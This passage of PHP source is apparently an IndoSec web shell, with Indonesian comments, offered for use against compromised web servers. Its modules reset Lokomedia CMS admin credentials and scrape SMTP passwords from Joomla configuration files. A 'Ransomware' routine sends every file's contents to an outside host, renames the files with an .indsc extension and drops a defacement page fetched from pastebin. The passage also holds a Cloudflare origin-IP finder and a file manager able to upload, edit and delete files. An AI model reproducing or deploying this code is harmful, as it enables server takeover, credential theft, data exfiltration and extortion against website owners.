- $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
- $result = mysql_fetch_array($q);
- $target = $result[alamat_website];
- if($target == '') {
- $target2 = $result[url];
- $url_target = "Login => <font color=red>Error, Tidak dapat mengambil nama domainnya</font><br>";
- if($target2 == '') {
- $url_target2 = "Login => <font color=red>Error, Tidak dapat mengambil nama domainnya</font><br>";
- } else {
- $cek_login3 = file_get_contents("$target2/adminweb/");
- $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
- if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
- $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
- } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
- $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
- } else {
- $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
- }
- }
- } else {
- $cek_login = file_get_contents("$target/adminweb/");
- $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
- if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
- $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
- } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
- $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
- } else {
- $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
- }
- }
- $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
- echo "Config => ".$file_conf."<br>";
- echo "CMS => Lokomedia<br>";
- if(preg_match('/Error, Tidak dapat mengambil nama domainnya/', $url_target)) {
- echo $url_target2;
- } else {
- echo $url_target;
- }
- if(!$update OR !$conn OR !$db) {
- echo "Status => <font color=red>".mysql_error()."</font><br><br>";
- } else {
- echo "Status => <font color=lime>Sukses, Silakan login dengan User & Password yang baru.</font><br><br>";
- }
- mysql_close($conn);
- }
- }
- }
- } else {
- echo "<h3 class='text-center mb-4'>Auto Edit User</h3>
- <form method='post'>
- <h5>Lokasi Dir Config</h5>
- <input type='text' class='form-control mb-3' name='config_dir' value='$dir'>
- <h5>Set User & Pass :</h5>
- <input type='text' name='user_baru' value='indosec' class='form-control mb-3' placeholder='Set Username'>
- <input type='text' name='pass_baru' value='indosec' class='form-control mb-4' placeholder='Set Password'>
- <input type='submit' name='hajar' value='Edit User' class='btn btn-danger btn-block'>
- </form>
- <p class='text-muted mb-4'>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</p>";
- }
- exit;
- }
- /*
- * Ransomware
- * IndoSec
- */
- if ($_GET['aksi'] == 'ransom') {
- if(isset($_POST["encrypt"])) {
- $dir = $_POST["path"];
- echo"<textarea class='form-control mb-4' rows='13' disabled=''>";
- function listFolderFiles($dir){
- if (is_dir($dir)) {
- $ffs = scandir($dir);
- unset($ffs[array_search('.', $ffs, true)]);
- unset($ffs[array_search('..', $ffs, true)]);
- if (count($ffs) < 1)
- return;
- foreach($ffs as $ff){
- $files = $dir."/".$ff;
- if(!is_dir($files)){
- /* encrypt file */
- $file = file_get_contents($files);
- $_a = base64_encode($file);
- /* proses curl */
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, 'http://encrypt.indsc.me/api.php?type=encrypt');
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS, "text=$_a");
- $x = json_decode(curl_exec($ch));
- if($x->status == 'success'){
- $_enc = base64_decode($x->data);
- rename($files, $files. ".indsc");
- echo "[+]$files => Success Encrypted\n";
- }
- }
- if(is_dir($dir.'/'.$ff)) listFolderFiles($dir.'/'.$ff);
- }
- $index = file_get_contents('https://pastebin.com/raw/aGZ6BeTH');
- $_o = fopen($dir."/index.html", "w");
- fwrite($_o, $index);
- fclose($_o);
- echo "\n[+] Done !";
- }else{
- echo "\nBukan dir";
- }
- }
- listFolderFiles($dir);
- echo "</textarea><br/>";
- }else{
- echo '<form method="post">
- <div class="form-group">
- <h4 class="text-center mb-4"><i class="fa fa-lock"></i> Ransomware</h4>
- <label>Pilih Directory :</label>
- <div class="form-group input-group">
- <div class="input-group-prepend">
- <div class="input-group-text"><i class="fa fa-home"></i></div>
- </div>
- <input type="text" name="path" class="form-control" value="'.$dir.'"/>
- </div>
- <input type="submit" name="encrypt" class="btn btn-danger btn-block" value="Encrypt"/>
- </div>
- </form>';
- }
- exit;
- }
- /*
- * SMTP Grabber
- * IndoXploit
- */
- if ($_GET['aksi'] == 'smtpgrab') {
- function scj($path) {
- $paths = scandir($path);
- foreach($paths as $pathb) {
- if(!is_file("$path/$pathb")) continue;
- $ambil = file_get_contents("$path/$pathb");
- $ambil = str_replace("$", "", $ambil);
- if(preg_match("/JConfig|joomla/", $ambil)) {
- $smtp_host = ambilkata($ambil,"smtphost = '","'");
- $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
- $smtp_user = ambilkata($ambil,"smtpuser = '","'");
- $smtp_pass = ambilkata($ambil,"smtppass = '","'");
- $smtp_port = ambilkata($ambil,"smtpport = '","'");
- $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
- echo "<table class='text-white table table-bordered'>
- <tr>
- <td>SMTP Host: $smtp_host</td>
- </tr>
- <tr>
- <td>SMTP Port: $smtp_port</td>
- </tr>
- <tr>
- <td>SMTP User: $smtp_user</td>
- </tr>
- <tr>
- <td>SMTP Pass: $smtp_pass</td>
- </tr>
- <tr>
- <td>SMTP Auth: $smtp_auth</td>
- </tr>
- <tr>
- <td>SMTP Secure: $smtp_secure</td>
- </tr>
- </table>";
- }
- }
- }
- echo "<p class='text-muted'>NB : Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/namafolder_config )</p>";
- $smtp = scj($path);
- exit;
- }
- /*
- * Bypass Cloud Flare
- */
- if ($_GET['aksi'] == 'bypascf') {
- echo '<form method="POST">
- <h5 class="text-center mb-3">Bypass Cloud Flare</h5>
- <div class="form-group input-group">
- <select class="form-control" name="idsPilih">
- <option>Pilih Metode</option>
- <option>ftp</option>
- <option>direct-conntect</option>
- <option>webmail</option>
- <option>cpanel</option>
- </select>
- </div>
- <div class="form-group input-group mb-4">
- <input class="form-control" type="text" name="target" placeholder="Masukan Url">
- <input class="btn btn-danger form-control" type="submit" value="Bypass">
- </div>
- </form>';
- $target = $_POST['target'];
- if($_POST['idsPilih'] == "ftp") {
- $ftp = gethostbyname("ftp."."$target");
- echo "<p align='center' dir='ltr'><font face='Tahoma' size='3' color='#00ff00'>Correct
- ip is : </font><font face='Tahoma' size='3' color='#F68B1F'>$ftp</font></p>";
- }
- if($_POST['idsPilih'] == "direct-conntect") {
- $direct = gethostbyname("direct-connect."."$target");
- echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='3' color='#00ff00'>Correct
- ip is : </font><font face='Tahoma' size='3' color='#F68B1F'>$direct</font></p>";
- }
- if($_POST['idsPilih'] == "webmail") {
- $web = gethostbyname("webmail."."$target");
- echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='3' color='#00ff00'>Correct
- ip is : </font><font face='Tahoma' size='3' color='#F68B1F'>$web</font></p>";
- }
- if($_POST['idsPilih'] == "cpanel") {
- $cpanel = gethostbyname("cpanel."."$target");
- echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='3' color='#00ff00'>Correct
- ip is : </font><font face='Tahoma' size='3' color='#F68B1F'>$cpanel</font></p>";
- }
- exit;
- }
- /*
- * Zip Menu
- * IndoSec
- */
- if($_GET['aksi'] == 'zip_menu') {
- //Compress/Zip
- $exzip = basename($dir).'.zip';
- function Zip($source, $destination){
- if (extension_loaded('zip') === true){
- if (file_exists($source) === true){
- $zip = new ZipArchive();
- if ($zip->open($destination, ZIPARCHIVE::CREATE) === true){
- $source = realpath($source);
- if (is_dir($source) === true){
- $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
- foreach ($files as $file){
- $file = realpath($file);
- if (is_dir($file) === true){
- $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
- }elseif(is_file($file) === true){
- $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
- }
- }
- }elseif(is_file($source) === true){
- $zip->addFromString(basename($source), file_get_contents($source));
- }
- }
- return @$zip->close();
- }
- }
- return false;
- }
- //Extract/Unzip
- function Zip_Extrack($zip_files, $to_dir){
- $zip = new ZipArchive();
- $res = $zip->open($zip_files);
- if ($res === TRUE) {
- $name = basename($zip_files, ".zip")."_unzip";
- @mkdir($name);
- @$zip->extractTo($to_dir."/".$name);
- return @$zip->close();
- }else{
- return false;
- }
- }
- echo '<div class="card card-body text-dark mb-4">
- <h4 class="text-center">Zip Menu</h3>
- <form enctype="multipart/form-data" method="post">
- <div class="form-group">
- <label>Zip File:</label>
- <div class="custom-file">
- <input type="file" name="zip_file" class="custom-file-input" id="customFile">
- <label class="custom-file-label" for="customFile">Choose file</label>
- </div>
- <input type="submit" name="upnun" class="btn btn-danger btn-block mt-3" value="Upload & Unzip"/>
- </div>
- </form>';
- if($_POST["upnun"]) {
- $filename = $_FILES["zip_file"]["name"];
- $tmp = $_FILES["zip_file"]["tmp_name"];
- if(move_uploaded_file($tmp, "$dir/$filename")){
- echo Zip_Extrack($filename, $dir);
- unlink($filename);
- $swa = "success";
- $text = "Berhasil Mengekstrak Zip";
- swall($swa,$text,$dir);
- } else {
- echo "<b>Gagal!</b>";
- }
- }
- echo "<div class='row'><div class='col-md-6 mb-3'><h5>Zip Backup</h5>
- <form method='post'>
- <label>Folder</label>
- <input type='text' name='folder' class='form-control mb-3' value='$dir'>
- <input type='submit' name='backup' class='btn btn-danger btn-block' value='Backup!'>
- </form>";
- if($_POST['backup']){
- $fol = $_POST['folder'];
- if(Zip($fol, $_POST["folder"].'/'.$exzip)){
- $swa = "success";
- $text = "Berhasil Membuat Zip";
- swall($swa,$text,$dir);
- }else{
- echo "<b>Gagal!</b>";
- }
- }
- echo "</div>
- <div class='col-md-6'><h5>Unzip Manual</h5>
- <form action='' method='post'>
- <label>Zip Location:</label>
- <input type='text' name='file_zip' class='form-control mb-3' value='$dir/$exzip'>
- <input type='submit' name='extrak' class='btn btn-danger btn-block' value='Unzip!'>
- </form>";
- if($_POST['extrak']){
- $zip = $_POST["file_zip"];
- if (Zip_Extrack($zip, $dir)){
- $swa = "success";
- $text = "Berhasil Mengekstrak Zip";
- swall($swa,$text,$dir);
- }else{
- echo "<b>Gagal!</b>";
- }
- }
- echo '</div></div></div>';
- }
- if(isset($_GET['path'])){
- $path = $_GET['path'];
- chdir($path);
- }else{
- $path = getcwd();
- }
- $path = str_replace('\\','/',$path);
- $paths = explode('/',$path);
- echo "Path : ";
- foreach($paths as $id=>$pat){
- if($pat == '' && $id == 0){
- $a = true;
- echo '<a href="?dir=/">/</a>';
- continue;
- }
- if($pat == '') continue;
- echo '<a style="word-wrap:break-word;" href="?dir=';
- for($i=0;$i<=$id;$i++){
- echo "$paths[$i]";
- if($i != $id) echo "/";
- }
- echo '">'.$pat.'</a>/';
- }
- $scandir = scandir($path);
- echo " [ ".w($dir, perms($dir))." ]";
- echo '<div id="tab"><table class="text-white mt-1 table-hover table-responsive">
- <thead class="bg-info text-center">
- <th class="text-left">File/Folder</th>
- <th>Size</th>
- <th style="width:50%;">Last Modified</th>
- <th>Permission</th>
- <th>Action</th>
- </thead>';
- foreach($scandir as $dir){
- $dtime = date("d/m/y G:i", filemtime("$dir/$dirx"));
- /* cek jika ini berbentuk folder */
- /* cek jika nama folder karaker terlalu panjang */
- if (strlen($dir) > 18) {
- $_dir = substr($dir, 0, 18)."...";
- }else{
- $_dir = $dir;
- }
- $_diir = $_dir;
- if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
- echo '<tr class="text-center">
- <td class="pinggir">'.$imgfol.' <a href="?dir='.$path.'/'.$dir.'">'.$_diir.'</a></td>
- <td>--</td>
- <td>
- '.$dtime.'
- </td>
- <td>
- <a href="?dir='.$path.'/'.$dir.'&aksi=chmod_dir">
- ';
- if(is_writable($path.'/'.$dir)) echo '<font color="#00ff00">';
- elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
- echo perms($path.'/'.$dir);
- if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font></a></td>
- <td><a title="Rename" class="badge badge-success" href="?dir='.$path.'/'.$dir.'&aksi=rename_folder"> <i class="fas fa-pen"></i> </a> <a title="Delete" class="badge badge-danger" href="?dir='.$path.'/'.$dir.'&aksi=hapus_folder"> <i class="fa fa-trash"></i> </a>
- </td>';
- }
- foreach($scandir as $file){
- $ftime = date("d/m/y G:i", filemtime("$path/$file"));
- /* cek jika ini berbentuk file */
- if(!is_file($path.'/'.$file)) continue;
- echo '<tr class="text-center">
- <td class="pinggir"><img src="';
- /* set image berdasarkan extensi file */
- $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
- if($ext == "php") {
- echo 'https://image.flaticon.com/icons/png/128/337/337947.png"';
- }elseif ($ext == "html") {
- echo 'https://image.flaticon.com/icons/png/128/136/136528.png"';
- }elseif ($ext == "css") {
- echo 'https://image.flaticon.com/icons/png/128/136/136527.png"';
- }elseif ($ext == "png") {
- echo 'https://image.flaticon.com/icons/png/128/136/136523.png"';
- }elseif ($ext == "jpg") {
- echo 'https://image.flaticon.com/icons/png/128/136/136524.png"';
- }elseif ($ext == "jpeg") {
- echo 'http://i.imgur.com/e8mkvPf.png"';
- }elseif($ext == "zip") {
- echo 'https://image.flaticon.com/icons/png/128/136/136544.png"';
- }elseif ($ext == "js") {
- echo 'https://image.flaticon.com/icons/png/128/1126/1126856.png';
- }elseif ($ext == "ttf") {
- echo 'https://image.flaticon.com/icons/png/128/1126/1126892.png';
- }elseif ($ext == "otf") {
- echo 'https://image.flaticon.com/icons/png/128/1126/1126891.png';
- }elseif ($ext == "txt") {
- echo 'https://image.flaticon.com/icons/png/128/136/136538.png';
- }elseif ($ext == "ico") {
- echo 'https://image.flaticon.com/icons/png/128/1126/1126873.png';
- }elseif ($ext == "conf") {
- echo 'https://image.flaticon.com/icons/png/512/1573/1573301.png';
- }elseif ($ext == "htaccess") {
- echo 'https://image.flaticon.com/icons/png/128/1720/1720444.png';
- }elseif ($ext == "sh") {
- echo 'https://image.flaticon.com/icons/png/128/617/617535.png';
- }elseif ($ext == "py") {
- echo 'https://image.flaticon.com/icons/png/128/180/180867.png';
- }elseif ($ext == "indsc") {
- echo 'https://image.flaticon.com/icons/png/512/1265/1265511.png';
- }elseif ($ext == "sql") {
- echo 'https://img.icons8.com/ultraviolet/2x/data-configuration.png';
- }elseif ($ext == "pl") {
- echo 'http://i.imgur.com/PnmX8H9.png';
- }elseif ($ext == "pdf") {
- echo 'https://image.flaticon.com/icons/png/128/136/136522.png';
- }elseif ($ext == "mp4") {
- echo 'https://image.flaticon.com/icons/png/128/136/136545.png';
- }elseif ($ext == "mp3") {
- echo 'https://image.flaticon.com/icons/png/128/136/136548.png';
- }elseif ($ext == "git") {
- echo 'https://image.flaticon.com/icons/png/128/617/617509.png';
- }elseif ($ext == "md") {
- echo 'https://image.flaticon.com/icons/png/128/617/617520.png';
- }else{
- echo 'http://icons.iconarchive.com/icons/zhoolego/material/256/Filetype-Docs-icon.png';
- }
- echo '" class="ico2"></img>';
- /* cek jika karaker terlalu panjang */
- if (strlen($file) > 25) {
- $_file = substr($file, 0, 25)."...-.".$ext;
- }else{
- $_file = $file;
- }
- echo' <a href="?dir='.$path.'&aksi=view&file='.$path.'/'.$file.'">'.$_file.'</a></td>
- <td>'.formatSize(filesize($file)).'</td>
- <td>'.$ftime.'</td>
- <td><a href="?dir='.$path.'&aksi=chmod_file&file='.$path.'/'.$file.'" class="text-center">';
- if(is_writable($path.'/'.$file)) echo '<font color="#00ff00">';
- elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
- echo perms($path.'/'.$file);
- if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font></a></td>
- <td class="d-flex">
- <a title="Lihat" class="badge badge-info" href="?dir='.$path.'&aksi=view&file='.$path.'/'.$file.'"> <i class="fa fa-eye"></i> </a>
- <a title="Edit" class="badge badge-success" href="?dir='.$path.'&aksi=edit&file='.$path.'/'.$file.'"> <i class="far fa-edit"></i> </a>
- <a title="Rename" class="badge badge-success" href="?dir='.$path.'&aksi=rename&file='.$path.'/'.$file.'"> <i class="fa fa-pencil"></i> </a>
- <a title="Delete" class="badge badge-danger" href="?dir='.$path.'&aksi=hapusf&file='.$path.'/'.$file.'" title="Delete"> <i class="fa fa-trash"></i> </a>
- <a title="Download" class="badge badge-primary" href="?&dir='.$path.'&aksi=download&file='.$path.'/'.$file.'" title="Download"> <i class="fa fa-download"></i> </a>
- </td>
- </tr>';
- }
- echo '</table></div></div></div><hr/>
- <center><a class="text-muted" href="https://facebook.com/IndoSecOfficial">Copyright 2019 { IndoSec }</a></center><br/>';
- echo "<a href='#' class='scrollToTop'><i class='fa fa-arrow-up up' aria-hidden='true'></i></a>";
- /*
- End
- */
- ?>
Add Comment
Please, Sign In to add comment